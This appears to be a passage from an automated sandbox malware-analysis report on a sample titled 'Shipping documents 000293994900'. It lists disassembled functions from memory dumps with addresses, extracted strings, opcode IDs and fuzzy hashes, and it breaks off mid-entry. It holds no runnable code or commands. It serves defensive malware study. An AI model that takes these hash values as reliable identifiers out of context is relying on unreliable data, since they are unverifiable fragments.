Instruction ID: 2528c75620c8f4a08f96293768b0edb768d486ecb9fd6be7740e0fc5360e64fd
Opcode Fuzzy Hash: 7287d4f83a92cedef9328cdd50ce3513a7b17e4aac4193ad38ef9cf09d25271b
Instruction Fuzzy Hash: FA319C30B002059FDB18AB78A9246AE77A6AF89310F20893CD406EB395DF35DD16CB95

Function 388D21F8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PH]q, xrefs: 388D2333

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: 394db5db6829a9e31e34fcd79a0171ef9e6e9e987bf9d40d14a928706683fef6
Instruction ID: 2f5c0104b648bd4423fadd6416683e6474e810e0b70015357608a13f8bb10dc3
Opcode Fuzzy Hash: 394db5db6829a9e31e34fcd79a0171ef9e6e9e987bf9d40d14a928706683fef6
Instruction Fuzzy Hash: 9C31B230700205CFDB09AB74C55466F77A7AF89240F508578D406DB395DF35ED0ACBA5

Function 00167D58 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

LR]q, xrefs: 00167DDD

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 162d5ed654bfbab4c0ab14640fd8f9b1454138f38d4dfc35c882c5fdc5c80f7d
Instruction ID: 4d413fa7f62c7dd8114f48f9053c0fbb8de45137f95e91427a9c6c4c798fc8b5
Opcode Fuzzy Hash: 162d5ed654bfbab4c0ab14640fd8f9b1454138f38d4dfc35c882c5fdc5c80f7d
Instruction Fuzzy Hash: F2318270E142199FDF24CBA5CC447AEBBB1FF85318F20886AE415EB280E7759C96CB41

Function 388D20A8 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

PRv5`Ay5, xrefs: 388D20FD

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: PRv5`Ay5
API String ID: 0-3536067443
Opcode ID: 58fe89bfee818d9ba16233b618187ef16b7d1341e0af86fe5ac9b8b18152550f
Instruction ID: 9acbc38ad2e79214e9a05798a680c1db39a9de10cfec86c7a43bb11342441f70
Opcode Fuzzy Hash: 58fe89bfee818d9ba16233b618187ef16b7d1341e0af86fe5ac9b8b18152550f
Instruction Fuzzy Hash: 35316D74A10209DBDB08CF75C85469EB7B2AF89304F10CA29E916EB750DB34BC4BCB50

Function 0016269C Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

d, xrefs: 0016269D

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 9c8c9acd41cf97313fbc990fdd2fdfdaa6f2be2be25c0f3057ba3d80f665983c
Instruction ID: 0d34db74aaf170ae2af6e8ea72ae462730f8fa31edd15cc95387ab8281119758
Opcode Fuzzy Hash: 9c8c9acd41cf97313fbc990fdd2fdfdaa6f2be2be25c0f3057ba3d80f665983c
Instruction Fuzzy Hash: E641E2B09007499FDB14CFA9C984ADEBFF5FF48314F148029E809AB254DB75A945CB90

Function 388D20B8 Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

PRv5`Ay5, xrefs: 388D20FD

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: PRv5`Ay5
API String ID: 0-3536067443
Opcode ID: 6c670d086599763b7b8449781dda47528074f9f0d7ce429a6c7b309162936c6e
Instruction ID: 2fcd3c377fb102f55226859820ad2217218a798144adbd1ff75d223700c0851f
Opcode Fuzzy Hash: 6c670d086599763b7b8449781dda47528074f9f0d7ce429a6c7b309162936c6e
Instruction Fuzzy Hash: A3315A74A10209DFDB09CF75C854A9EB7B2AF89304F10C629E91AEB750DB75BC4ACB50

Function 0016A110 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

,Rv5PRv5`Ay5, xrefs: 0016A155

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: ,Rv5PRv5`Ay5
API String ID: 0-1848344747
Opcode ID: 37fca9181565a867cf47de4373fb10b2d5c2ced7b78a9326186b6b8eaed115aa
Instruction ID: 0f2cee54fbe323b8ec6da98749e31dc7fcf4b5818d3fe6c6e6ec303c28b3d03d
Opcode Fuzzy Hash: 37fca9181565a867cf47de4373fb10b2d5c2ced7b78a9326186b6b8eaed115aa
Instruction Fuzzy Hash: 4D217171E0020A9BDB09CF64C85069EF7B2FF8A304F54C629E915FB241DB70AC96CB91

Function 00161839 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

T, xrefs: 00161841

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: T
API String ID: 0-3187964512
Opcode ID: abab4712eac2f1ba09c2e52c840033c06dd0c25553b2c0dd889485689b38f073
Instruction ID: fd7c62e7662040d00e76615fb7189638c5e8506ddfb39af376eb5ef42dfaa3a2
Opcode Fuzzy Hash: abab4712eac2f1ba09c2e52c840033c06dd0c25553b2c0dd889485689b38f073
Instruction Fuzzy Hash: 7D218B30A04244AFDB14DB38CD657AE77F2AF89309F1404ADE402EB3A0DB758C51CB91

Function 0016E298 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

|, xrefs: 0016E2F8

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: e2a43f5ca5c73ec9a003650f93238a3c2bffe59756eb4c893daa7159e248e93f
Instruction ID: cd2ed79f353d875efb561e4426220a0ac276403ac08dfea217720589612d3222
Opcode Fuzzy Hash: e2a43f5ca5c73ec9a003650f93238a3c2bffe59756eb4c893daa7159e248e93f
Instruction Fuzzy Hash: 8A11AFB0F402149FDB44DB788805B9EB7F5AF4C700F008469E50AEB390EB359C018B80

Function 00160848 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

t!s5, xrefs: 00160860, 0016088C, 00160899

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: t!s5
API String ID: 0-2922850838
Opcode ID: cd625a31e14b92a881f35279783cabffe26f0685d266208a9ba7f0a3c4eb008b
Instruction ID: 47cdf0c77e335d7b1a95049f07f2c13eca9bb1a4b8aac36e7ae99540627437d0
Opcode Fuzzy Hash: cd625a31e14b92a881f35279783cabffe26f0685d266208a9ba7f0a3c4eb008b
Instruction Fuzzy Hash: AF118C30F002048FEF66DB79DD1472B329AEB89325F60497AE546DB291DB24CDA18BD1

Function 0016E2A8 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

|, xrefs: 0016E2F8

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 1f16dcede9a9c77728614903f8a7161e6b65b211becadccecb008e571e5394fd
Instruction ID: dd044440745fbb250deb41605930a79de12f747e0e127b24ae2b9adcd77d0fed
Opcode Fuzzy Hash: 1f16dcede9a9c77728614903f8a7161e6b65b211becadccecb008e571e5394fd
Instruction Fuzzy Hash: A2115B74F002159FDB54AB78C805B6EB7F1AF4C704F14846AE50AE73A0EB399D018B81

Function 00166B60 Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

LR]q, xrefs: 00166B97

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 82cbb46301b2013edd67b32fbf68687edb3518b1923d2a1ebf7b1fff29d9c32b
Instruction ID: b2b54632e565c9a28ab950fc3dda433980cd4e6dc6868932c33f8d4818543ae7
Opcode Fuzzy Hash: 82cbb46301b2013edd67b32fbf68687edb3518b1923d2a1ebf7b1fff29d9c32b
Instruction Fuzzy Hash: 5D11C2317092449FC7169B38942069D7BF6AF86704B1444ABE445CB392DE758C49CB92

Function 388D8390 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

$]q, xrefs: 388D83DB

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: 57abc324e7e01a8c89c55f412a7de28fe420882f9b3c138e61ac3aef606c0969
Instruction ID: f46a8ebe73d7fb67b1054ca5a659277b766fa65b44362ab879f0dfbfc7f01f5a
Opcode Fuzzy Hash: 57abc324e7e01a8c89c55f412a7de28fe420882f9b3c138e61ac3aef606c0969
Instruction Fuzzy Hash: EDF0AF76700206CFEF188E69E9816AD73A6EB48394F914C36D908D7762CA31D90BC790

Function 001687B9 Relevance: .6, Instructions: 554COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84e9b95cf1c707e6c84b93c54bb2583c7c1a7d0c354d499f49dbd1e7af83bbc1
Instruction ID: 185b06d0803e524200d80f1e05dcb8d6153e519ec5d92a0a31ab84e28524ae03
Opcode Fuzzy Hash: 84e9b95cf1c707e6c84b93c54bb2583c7c1a7d0c354d499f49dbd1e7af83bbc1
Instruction Fuzzy Hash: 05125030700105ABCB19AB38E85566873A7EBC9349B508A3EE405DB766CFB5DC87DB81

Function 00164A4D Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6034c4cf870e6abcbe538e8b872abee9272c4a4da36987cd8e9f1aa24d25abe7
Instruction ID: 939686077d5b4fff3403ba2ad627867c1ab66da0a5f16bbc35650b004225f5c2
Opcode Fuzzy Hash: 6034c4cf870e6abcbe538e8b872abee9272c4a4da36987cd8e9f1aa24d25abe7
Instruction Fuzzy Hash: E8B14B70E00209CFDF14CFA9D9957EDBBF1AF88714F248129D819A7294EB7498A5CB81

Function 0016DE58 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 309d41373ba10337cfefd3593c8fc3c9fcc30b9c4f8cc44bbaaa35315ebfb227
Instruction ID: 5b9ee83fa78a04b551410a1277d2ef7c3ecfac70f83a2479fb10526c85d8448a
Opcode Fuzzy Hash: 309d41373ba10337cfefd3593c8fc3c9fcc30b9c4f8cc44bbaaa35315ebfb227
Instruction Fuzzy Hash: A491C270B002169FDB15CF28CC80A2AB7B6FF95314F2586A6D419DB296CB35EC93C791

Function 00163E34 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 420a7f5de191e740d8edfdf68573b91601b89d85c01c606e3ee30209930a7b0c
Instruction ID: 0a381205220d3b1c405d5039db53e782a1e01717a40761105369151531f6f733
Opcode Fuzzy Hash: 420a7f5de191e740d8edfdf68573b91601b89d85c01c606e3ee30209930a7b0c
Instruction Fuzzy Hash: 4D917E70E00209DFDF14CFA9DD857EEBBF2AF88304F248129E415A7294EB749995CB91

Function 388D62C0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19f57c0bb7dfec068fc0ad02ab417088e4af7699de00827fc4ab22be4739e7cb
Instruction ID: 8f6a6fd6f1433f0e49bf648690bd28e8d9af46c4f6594a4277c23a840a74c8e5
Opcode Fuzzy Hash: 19f57c0bb7dfec068fc0ad02ab417088e4af7699de00827fc4ab22be4739e7cb
Instruction Fuzzy Hash: E5619E72F001228FDB14AE7EC88065FBADBAF94260B154079D80EDB365DE79ED0687D1

Function 388D46B8 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 012d91cc94340897d943852087fcf82312facc241680838a8ac051abe9fdc58b
Instruction ID: 758f407ff671c72315955f8daae086a45646bda31b2214dc16760bb69b1db5ba
Opcode Fuzzy Hash: 012d91cc94340897d943852087fcf82312facc241680838a8ac051abe9fdc58b
Instruction Fuzzy Hash: 53912D34E00219CFEB10DF68C890B8DB7B1FF89314F208699D549BB295DB70AA86CF51

Function 388D4399 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16ee5ea1e2ae1859eb9a999675ffbe368928f4f32f0c7ef88b0521719df14369
Instruction ID: d77c2d8e272caf5c1225f3448bb468bc2150dc3f9530702892c586f8bf0529a1
Opcode Fuzzy Hash: 16ee5ea1e2ae1859eb9a999675ffbe368928f4f32f0c7ef88b0521719df14369
Instruction Fuzzy Hash: A2814E34B002098FEB44DFB9D45469EB7F3AF89344F208529D41AEB395DB34ED468B92

Function 0016A750 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be150239b4fa09e98dd4ba6a32bd0b33783f3a789507f889f565f0d2479938a5
Instruction ID: c2c6aa146e27720c50dbfc8d8a07b2445fbd4fa39634a4323790e95fb0ec4ad8
Opcode Fuzzy Hash: be150239b4fa09e98dd4ba6a32bd0b33783f3a789507f889f565f0d2479938a5
Instruction Fuzzy Hash: E5719B71A002058FDB14DF69D884B9EBBB6FF88314F24C269E909AB395DB70DC45CB91

Function 388D46D0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 355298f689e844bff306b5619e52985a791799a2065993232fbf22638d019b18
Instruction ID: 84a778d49a3b8573f39597591daf96896298318f95ac0b35ce44a807e6247d36
Opcode Fuzzy Hash: 355298f689e844bff306b5619e52985a791799a2065993232fbf22638d019b18
Instruction Fuzzy Hash: 0D912C34E00619CBEB14DF68C890B8DB7B1FF89314F208699D54DBB255DB70AA86CF91

Function 001647D0 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc66218fc0afe033763adf98d2ebac79c33e0b5bac015d6a1ff8266c24fd7a
Instruction ID: 8635eea22ad026993abc4c3d236fffce0e25b977df7334c20cb794c329c4ce35
Opcode Fuzzy Hash: eecc66218fc0afe033763adf98d2ebac79c33e0b5bac015d6a1ff8266c24fd7a
Instruction Fuzzy Hash: F9717DB0E00249DFDF14DFA9D88179EBBF2BF88708F148129E415A7254EB749852CB95

Function 388DFC68 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c2ec4df3e07d2de62df5a4692e881cb637d3e980fe61062f57ed2967db9160a
Instruction ID: 500374a326240217c7335fed06b2a942ce228a3d096da42972cec61cdbe0e7fe
Opcode Fuzzy Hash: 1c2ec4df3e07d2de62df5a4692e881cb637d3e980fe61062f57ed2967db9160a
Instruction Fuzzy Hash: 71511335E00108DFEB14ABB8E46469DB7B2FF88315F10897AE016EB351DB35880ACB81

Function 001647C4 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77450a072d70e0b13c67743c962b7c84954fd748d8b89988c65b861180590cf1
Instruction ID: bd367be38e8e1a62877ae1bb30f98799ad65650097a02769a8fe2c03656908b8
Opcode Fuzzy Hash: 77450a072d70e0b13c67743c962b7c84954fd748d8b89988c65b861180590cf1
Instruction Fuzzy Hash: 56716CB0E00249DFDF14DFA9D8817DEBBF1BF88708F148129E415A7254EB749891CB95

Function 388DFA18 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29c248fb2f8ecf3c89fcf5894186fd3a2f2926edc15cf61e7e5fa60f99cf7721
Instruction ID: fe5e12d692b37bddf4487139b2f4d037cbd89ba4c20d3218d181355ae3971269
Opcode Fuzzy Hash: 29c248fb2f8ecf3c89fcf5894186fd3a2f2926edc15cf61e7e5fa60f99cf7721
Instruction Fuzzy Hash: 0251F378700214CFFB145B7CD96471F2A5FDB89390F20492AE90AD77A6C968CC4B93E2

Function 388DFA28 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f41752bbbb4b79fea12699e2f6548514b0cf90469330ed67edb98138f0b2665
Instruction ID: a44a26eb99f51f8ac8a4ce908b2e6915bed1d5c7270643b864eb41072d66d59a
Opcode Fuzzy Hash: 0f41752bbbb4b79fea12699e2f6548514b0cf90469330ed67edb98138f0b2665
Instruction Fuzzy Hash: 4651E178700218CFFB14576CD964B2F265FDB89394F20482AE90AD77A5C96CCC4B93E2

Function 0016A590 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59bf5692accda05c7dc5de545cb95c6c338e54e10095fd1e7b92e2c810300be4
Instruction ID: fe772d4cb0eba38899cd492cd474b3dcc7e83718502a9a0cd89e50cb4e089aca
Opcode Fuzzy Hash: 59bf5692accda05c7dc5de545cb95c6c338e54e10095fd1e7b92e2c810300be4
Instruction Fuzzy Hash: F941A430B002058FDF24DB68C99076EB7A6EF95314FA4882AD51AEB381D735DC568F83

Function 0016E7F8 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d3cc61c9ba1bfc2df0cdfe7d5ac9a5eca686d3dd509567961a0b8c923d3c2f7
Instruction ID: b89db239320b841be33b073799f22b3840694b1d4b16ce8b758c55654d292ce5
Opcode Fuzzy Hash: 6d3cc61c9ba1bfc2df0cdfe7d5ac9a5eca686d3dd509567961a0b8c923d3c2f7
Instruction Fuzzy Hash: C2412371D043959FCB10DF6AD8406EEBBF5AF89310F0486AAD808E7281DB789845CBD1

Function 00166C9C Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a4d2678ee89a920ee28576a3dbe03e534f7977bf9934d6a878266df093678c
Instruction ID: 1a017f9a8efc409ede721a06da2609e9c0d15d3b45fc5f1c1a7aa278b1dc50dd
Opcode Fuzzy Hash: a0a4d2678ee89a920ee28576a3dbe03e534f7977bf9934d6a878266df093678c
Instruction Fuzzy Hash: 6D5125B4E002188FDB18CFA9C885B9DBBB1FF48304F148119E81ABB391D774A845CF95

Function 00166CA8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6afdce083be285c0eb2423dde3c6412b17b53c76d373799f7adc7cd2d2d1e0b4
Instruction ID: a8524534d183d088abb0f16e6ff18fa95c7ceb102374b2bd04c66f90094c0448
Opcode Fuzzy Hash: 6afdce083be285c0eb2423dde3c6412b17b53c76d373799f7adc7cd2d2d1e0b4
Instruction Fuzzy Hash: DF5106B4E002188FDB18CFA9C895B9DBBB1FF48314F148519E81ABB395D774A844CF95

Function 388D5511 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3325039735.00000000388D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 388D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_388d0000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a4d8af2e851aa22d1498105466e633b1d67fde4a809ffcc3ce16a2fec6246d
Instruction ID: cc6b57dc185819ee5d3a5c04c33a7fb9b62f15749bc47115fe16b83608578e4f
Opcode Fuzzy Hash: 34a4d8af2e851aa22d1498105466e633b1d67fde4a809ffcc3ce16a2fec6246d
Instruction Fuzzy Hash: 95415175A00609CFEB20CFA9D8C0AAFF7F2FB44350F104A2AD15AD7A50D731E9498B91

Function 00166F2C Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 243b3421537ee362850d56cbf2585aaf4eb7f3b8ab2904ac96b1b6dce132caaf
Instruction ID: c52ef86c0ba7cdfe5554ab18e6ab49a6b596c09bcee3ba7844d562702fac5e7e
Opcode Fuzzy Hash: 243b3421537ee362850d56cbf2585aaf4eb7f3b8ab2904ac96b1b6dce132caaf
Instruction Fuzzy Hash: A1411434614214CFDB14DB68C858AAE77F6AF4D714F2144A9E402EB3A1CB75EC41CBA0

Function 0016EF10 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ca1daa8b9a5bec2d7f8e8b4ea6b2db9f8e79f62dd344ca26317e478e8e6f51a
Instruction ID: 4f0fb30adbf4d87b7f39728caf4dccfa1c2d87fbe0d22398b61dbe94124b526e
Opcode Fuzzy Hash: 3ca1daa8b9a5bec2d7f8e8b4ea6b2db9f8e79f62dd344ca26317e478e8e6f51a
Instruction Fuzzy Hash: 5341A534A102498FDB20CF64D84069EB7F6EF89304F108669E819EB645DB75A85ACB81

Function 0016E998 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c7afd59386f17f81b301237f761d99390d846205675198f8bd15c4061da08f
Instruction ID: d3cae5cf59946b5fdc7f6c7365d2ba8912e27524aac2cb009a316e0de20c4718
Opcode Fuzzy Hash: d7c7afd59386f17f81b301237f761d99390d846205675198f8bd15c4061da08f
Instruction Fuzzy Hash: CD413834600204CFCB18DB69C994AAABBF6FF88714B508569E516EB375DB70EC45CB50

Function 0016E988 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Shipping documents 000293994900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01b96cfc601551ce8363d86d0c7bd2618cb92baacb1c182d84051d2f0d58cad7
Instruction ID: ced5054ae86beba300c4f011fc1c88d5a424f541b3c77f6ecd4dddd8d9e4d08d
Opcode Fuzzy Hash: 01b96cfc601551ce8363d86d0c7bd2618cb92baacb1c182d84051d2f0d58cad7
Instruction Fuzzy Hash: 8B414A38600204CFCB14DF69C984A6ABBF6FF88714F5585A9E916EB365DB70EC41CB50

Function 00161138 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3301183823.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

